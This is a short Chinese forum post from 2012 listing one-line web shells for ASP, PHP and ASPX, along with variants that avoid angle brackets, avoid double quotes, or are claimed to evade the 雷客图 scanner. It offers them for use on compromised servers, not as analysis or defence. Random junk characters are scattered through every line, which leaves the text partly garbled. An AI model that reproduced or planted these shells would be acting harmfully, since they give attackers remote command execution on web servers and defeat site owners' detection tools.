asp一句话 <%execute(request("1"))%>
1 o2 F8 J" _; P: K& M9 f* N6 {' x. T5 Y8 b8 L* B, G
php一句话 <?php eval($_POST[1]);?> $ Z- N$ ?# F) M% E/ x3 u3 O1 G
" J6 w% `9 T( A$ H2 r; ]8 y; V# J) ~aspx一句话
* Z3 q/ K- O2 O4 s. r0 P2 k5 A0 W0 @3 Q, j; Q
<script language="C#" runat="server">
! H) i& [( H: f" \! y, H/ y# A
3 q3 ]5 J* H6 k# M D) lWebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");. B8 m" z* m9 \7 l5 B( a9 p
/ s4 K, H/ b( R5 f9 c* q+ h
</script>3 n7 F' D5 _) x( D9 y: t/ Z
' K4 @8 k3 U5 @, L0 M) u
可以躲过雷客图的一句话。/ g d8 J) Z. M4 [" k
: _8 O4 [! I O' j <%
9 O$ f: ?: x" X( c" Y5 M" Z9 o, z9 ?# L+ i
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")5 U: M! f2 F9 X8 q( q6 W y
4 \4 }8 c- g ~3 j" k ms.Language="VBScript"
1 s6 |' a5 |& S& s: M$ T. u
" e: D( Q" u( @/ b8 B ms.AddObject "Response", Response
1 n- d5 k9 Z0 {% R9 ^
$ z) r" O- ?% X4 D ms.AddObject "request", request! A' R# \7 J2 s7 {2 e7 \
% K& F) Y$ }: p& @1 G
ms.ExecuteStatement("ev"&"al(request(""1""))")
) T* e5 J0 X: \, @/ S' S: C' _1 `- ~0 F' G1 T
%>
% w3 S! G w/ v, Z) x( o' T. B1 n B! K( m1 S. |6 `2 f7 f0 Y- a
不用'<,>'的asp一句话: J: w8 d) K( X, x7 l
; \# Z3 V) e% `2 ^: ` Q <script language=VBScript runat=server>execute request("1")</script>$ T* M+ W: O, [ z
, }6 Q3 [* P# `6 S0 F
不用双引号的一句话。1 @5 v) y! T5 W# v5 d0 _
1 `$ s1 @- }$ w7 \$ h" g <%eval request(chr(35))%>
9 ~& I8 x6 F; Y/ a2 d7 h6 y" _ |
发表于 2012-9-23 14:36:09
收藏
支持
反对